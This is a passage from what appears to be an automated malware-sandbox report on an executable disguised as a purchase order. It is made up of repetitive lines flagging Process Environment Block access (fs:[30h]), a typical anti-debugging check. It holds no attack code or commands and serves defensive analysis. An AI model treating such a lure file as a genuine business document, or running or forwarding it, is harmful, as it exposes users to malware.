              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157656A mov eax, dword ptr fs:[00000030h]0_2_0157656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D6500 mov eax, dword ptr fs:[00000030h]0_2_015D6500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550535 mov eax, dword ptr fs:[00000030h]0_2_01550535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550535 mov eax, dword ptr fs:[00000030h]0_2_01550535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550535 mov eax, dword ptr fs:[00000030h]0_2_01550535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550535 mov eax, dword ptr fs:[00000030h]0_2_01550535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550535 mov eax, dword ptr fs:[00000030h]0_2_01550535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550535 mov eax, dword ptr fs:[00000030h]0_2_01550535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614500 mov eax, dword ptr fs:[00000030h]0_2_01614500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614500 mov eax, dword ptr fs:[00000030h]0_2_01614500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614500 mov eax, dword ptr fs:[00000030h]0_2_01614500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614500 mov eax, dword ptr fs:[00000030h]0_2_01614500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614500 mov eax, dword ptr fs:[00000030h]0_2_01614500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614500 mov eax, dword ptr fs:[00000030h]0_2_01614500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614500 mov eax, dword ptr fs:[00000030h]0_2_01614500
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E53E mov eax, dword ptr fs:[00000030h]0_2_0156E53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E53E mov eax, dword ptr fs:[00000030h]0_2_0156E53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E53E mov eax, dword ptr fs:[00000030h]0_2_0156E53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E53E mov eax, dword ptr fs:[00000030h]0_2_0156E53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E53E mov eax, dword ptr fs:[00000030h]0_2_0156E53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015465D0 mov eax, dword ptr fs:[00000030h]0_2_015465D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A5D0 mov eax, dword ptr fs:[00000030h]0_2_0157A5D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A5D0 mov eax, dword ptr fs:[00000030h]0_2_0157A5D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E5CF mov eax, dword ptr fs:[00000030h]0_2_0157E5CF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E5CF mov eax, dword ptr fs:[00000030h]0_2_0157E5CF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E5E7 mov eax, dword ptr fs:[00000030h]0_2_0156E5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015425E0 mov eax, dword ptr fs:[00000030h]0_2_015425E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C5ED mov eax, dword ptr fs:[00000030h]0_2_0157C5ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C5ED mov eax, dword ptr fs:[00000030h]0_2_0157C5ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E59C mov eax, dword ptr fs:[00000030h]0_2_0157E59C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01542582 mov eax, dword ptr fs:[00000030h]0_2_01542582
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01542582 mov ecx, dword ptr fs:[00000030h]0_2_01542582
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01574588 mov eax, dword ptr fs:[00000030h]0_2_01574588
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015645B1 mov eax, dword ptr fs:[00000030h]0_2_015645B1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015645B1 mov eax, dword ptr fs:[00000030h]0_2_015645B1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C05A7 mov eax, dword ptr fs:[00000030h]0_2_015C05A7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C05A7 mov eax, dword ptr fs:[00000030h]0_2_015C05A7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C05A7 mov eax, dword ptr fs:[00000030h]0_2_015C05A7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FA456 mov eax, dword ptr fs:[00000030h]0_2_015FA456
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156245A mov eax, dword ptr fs:[00000030h]0_2_0156245A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153645D mov eax, dword ptr fs:[00000030h]0_2_0153645D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E443 mov eax, dword ptr fs:[00000030h]0_2_0157E443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156A470 mov eax, dword ptr fs:[00000030h]0_2_0156A470
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156A470 mov eax, dword ptr fs:[00000030h]0_2_0156A470
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156A470 mov eax, dword ptr fs:[00000030h]0_2_0156A470
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CC460 mov ecx, dword ptr fs:[00000030h]0_2_015CC460
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01578402 mov eax, dword ptr fs:[00000030h]0_2_01578402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01578402 mov eax, dword ptr fs:[00000030h]0_2_01578402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01578402 mov eax, dword ptr fs:[00000030h]0_2_01578402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A430 mov eax, dword ptr fs:[00000030h]0_2_0157A430
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153E420 mov eax, dword ptr fs:[00000030h]0_2_0153E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153E420 mov eax, dword ptr fs:[00000030h]0_2_0153E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153E420 mov eax, dword ptr fs:[00000030h]0_2_0153E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153C427 mov eax, dword ptr fs:[00000030h]0_2_0153C427
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6420 mov eax, dword ptr fs:[00000030h]0_2_015C6420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6420 mov eax, dword ptr fs:[00000030h]0_2_015C6420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6420 mov eax, dword ptr fs:[00000030h]0_2_015C6420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6420 mov eax, dword ptr fs:[00000030h]0_2_015C6420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6420 mov eax, dword ptr fs:[00000030h]0_2_015C6420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6420 mov eax, dword ptr fs:[00000030h]0_2_015C6420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6420 mov eax, dword ptr fs:[00000030h]0_2_015C6420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015404E5 mov ecx, dword ptr fs:[00000030h]0_2_015404E5
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FA49A mov eax, dword ptr fs:[00000030h]0_2_015FA49A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015744B0 mov ecx, dword ptr fs:[00000030h]0_2_015744B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CA4B0 mov eax, dword ptr fs:[00000030h]0_2_015CA4B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015464AB mov eax, dword ptr fs:[00000030h]0_2_015464AB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CE75D mov eax, dword ptr fs:[00000030h]0_2_015CE75D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540750 mov eax, dword ptr fs:[00000030h]0_2_01540750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582750 mov eax, dword ptr fs:[00000030h]0_2_01582750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582750 mov eax, dword ptr fs:[00000030h]0_2_01582750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C4755 mov eax, dword ptr fs:[00000030h]0_2_015C4755
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157674D mov esi, dword ptr fs:[00000030h]0_2_0157674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157674D mov eax, dword ptr fs:[00000030h]0_2_0157674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157674D mov eax, dword ptr fs:[00000030h]0_2_0157674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548770 mov eax, dword ptr fs:[00000030h]0_2_01548770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550770 mov eax, dword ptr fs:[00000030h]0_2_01550770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540710 mov eax, dword ptr fs:[00000030h]0_2_01540710
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01570710 mov eax, dword ptr fs:[00000030h]0_2_01570710
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C700 mov eax, dword ptr fs:[00000030h]0_2_0157C700
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157273C mov eax, dword ptr fs:[00000030h]0_2_0157273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157273C mov ecx, dword ptr fs:[00000030h]0_2_0157273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157273C mov eax, dword ptr fs:[00000030h]0_2_0157273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BC730 mov eax, dword ptr fs:[00000030h]0_2_015BC730
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C720 mov eax, dword ptr fs:[00000030h]0_2_0157C720
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C720 mov eax, dword ptr fs:[00000030h]0_2_0157C720
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154C7C0 mov eax, dword ptr fs:[00000030h]0_2_0154C7C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C07C3 mov eax, dword ptr fs:[00000030h]0_2_015C07C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015447FB mov eax, dword ptr fs:[00000030h]0_2_015447FB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015447FB mov eax, dword ptr fs:[00000030h]0_2_015447FB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015627ED mov eax, dword ptr fs:[00000030h]0_2_015627ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015627ED mov eax, dword ptr fs:[00000030h]0_2_015627ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015627ED mov eax, dword ptr fs:[00000030h]0_2_015627ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CE7E1 mov eax, dword ptr fs:[00000030h]0_2_015CE7E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E678E mov eax, dword ptr fs:[00000030h]0_2_015E678E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015407AF mov eax, dword ptr fs:[00000030h]0_2_015407AF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F47A0 mov eax, dword ptr fs:[00000030h]0_2_015F47A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160866E mov eax, dword ptr fs:[00000030h]0_2_0160866E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160866E mov eax, dword ptr fs:[00000030h]0_2_0160866E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155C640 mov eax, dword ptr fs:[00000030h]0_2_0155C640
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01572674 mov eax, dword ptr fs:[00000030h]0_2_01572674
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A660 mov eax, dword ptr fs:[00000030h]0_2_0157A660
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A660 mov eax, dword ptr fs:[00000030h]0_2_0157A660
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582619 mov eax, dword ptr fs:[00000030h]0_2_01582619
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE609 mov eax, dword ptr fs:[00000030h]0_2_015BE609
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155260B mov eax, dword ptr fs:[00000030h]0_2_0155260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155260B mov eax, dword ptr fs:[00000030h]0_2_0155260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155260B mov eax, dword ptr fs:[00000030h]0_2_0155260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155260B mov eax, dword ptr fs:[00000030h]0_2_0155260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155260B mov eax, dword ptr fs:[00000030h]0_2_0155260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155260B mov eax, dword ptr fs:[00000030h]0_2_0155260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155260B mov eax, dword ptr fs:[00000030h]0_2_0155260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E627 mov eax, dword ptr fs:[00000030h]0_2_0155E627
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01576620 mov eax, dword ptr fs:[00000030h]0_2_01576620
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01578620 mov eax, dword ptr fs:[00000030h]0_2_01578620
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154262C mov eax, dword ptr fs:[00000030h]0_2_0154262C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0157A6C7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A6C7 mov eax, dword ptr fs:[00000030h]0_2_0157A6C7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE6F2 mov eax, dword ptr fs:[00000030h]0_2_015BE6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE6F2 mov eax, dword ptr fs:[00000030h]0_2_015BE6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE6F2 mov eax, dword ptr fs:[00000030h]0_2_015BE6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE6F2 mov eax, dword ptr fs:[00000030h]0_2_015BE6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C06F1 mov eax, dword ptr fs:[00000030h]0_2_015C06F1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C06F1 mov eax, dword ptr fs:[00000030h]0_2_015C06F1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01544690 mov eax, dword ptr fs:[00000030h]0_2_01544690
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01544690 mov eax, dword ptr fs:[00000030h]0_2_01544690
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015766B0 mov eax, dword ptr fs:[00000030h]0_2_015766B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C6A6 mov eax, dword ptr fs:[00000030h]0_2_0157C6A6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C0946 mov eax, dword ptr fs:[00000030h]0_2_015C0946
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CC97C mov eax, dword ptr fs:[00000030h]0_2_015CC97C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E4978 mov eax, dword ptr fs:[00000030h]0_2_015E4978
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E4978 mov eax, dword ptr fs:[00000030h]0_2_015E4978
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01566962 mov eax, dword ptr fs:[00000030h]0_2_01566962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01566962 mov eax, dword ptr fs:[00000030h]0_2_01566962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01566962 mov eax, dword ptr fs:[00000030h]0_2_01566962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0158096E mov eax, dword ptr fs:[00000030h]0_2_0158096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0158096E mov edx, dword ptr fs:[00000030h]0_2_0158096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0158096E mov eax, dword ptr fs:[00000030h]0_2_0158096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01538918 mov eax, dword ptr fs:[00000030h]0_2_01538918
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01538918 mov eax, dword ptr fs:[00000030h]0_2_01538918
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CC912 mov eax, dword ptr fs:[00000030h]0_2_015CC912
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE908 mov eax, dword ptr fs:[00000030h]0_2_015BE908
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE908 mov eax, dword ptr fs:[00000030h]0_2_015BE908
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C892A mov eax, dword ptr fs:[00000030h]0_2_015C892A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D892B mov eax, dword ptr fs:[00000030h]0_2_015D892B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A9D0 mov eax, dword ptr fs:[00000030h]0_2_0154A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A9D0 mov eax, dword ptr fs:[00000030h]0_2_0154A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A9D0 mov eax, dword ptr fs:[00000030h]0_2_0154A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A9D0 mov eax, dword ptr fs:[00000030h]0_2_0154A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A9D0 mov eax, dword ptr fs:[00000030h]0_2_0154A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A9D0 mov eax, dword ptr fs:[00000030h]0_2_0154A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015749D0 mov eax, dword ptr fs:[00000030h]0_2_015749D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D69C0 mov eax, dword ptr fs:[00000030h]0_2_015D69C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015729F9 mov eax, dword ptr fs:[00000030h]0_2_015729F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015729F9 mov eax, dword ptr fs:[00000030h]0_2_015729F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160A9D3 mov eax, dword ptr fs:[00000030h]0_2_0160A9D3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CE9E0 mov eax, dword ptr fs:[00000030h]0_2_015CE9E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C89B3 mov esi, dword ptr fs:[00000030h]0_2_015C89B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C89B3 mov eax, dword ptr fs:[00000030h]0_2_015C89B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C89B3 mov eax, dword ptr fs:[00000030h]0_2_015C89B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
